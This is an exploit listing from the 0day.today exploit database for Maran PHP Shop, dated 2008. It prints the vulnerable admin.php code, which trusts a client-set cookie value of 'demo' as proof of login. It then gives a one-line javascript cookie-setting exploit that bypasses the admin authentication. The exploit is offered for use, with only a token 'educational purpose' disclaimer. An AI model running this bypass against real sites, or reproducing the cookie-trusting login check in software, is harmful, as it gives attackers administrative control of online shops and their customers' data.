[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4034
Category
web applications
Date add
02-11-2008
Platform
unsorted
=================================================================
Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
=================================================================


# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
# url: http://www.maran.pamil-visions.com/maranshop.php
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: /admin.php
vuln code:
<?
$readcookie = $_COOKIE['user'];
if($readcookie!="demo"){echo "error 467. bad login! <a href='login.php'>login here</a>";exit;}
//echo $_COOKIE['user'];
?>

exploit:
javascript:document.cookie = "user=demo; path=/";

Hack0wn :D



#  0day.today [2024-12-25]  #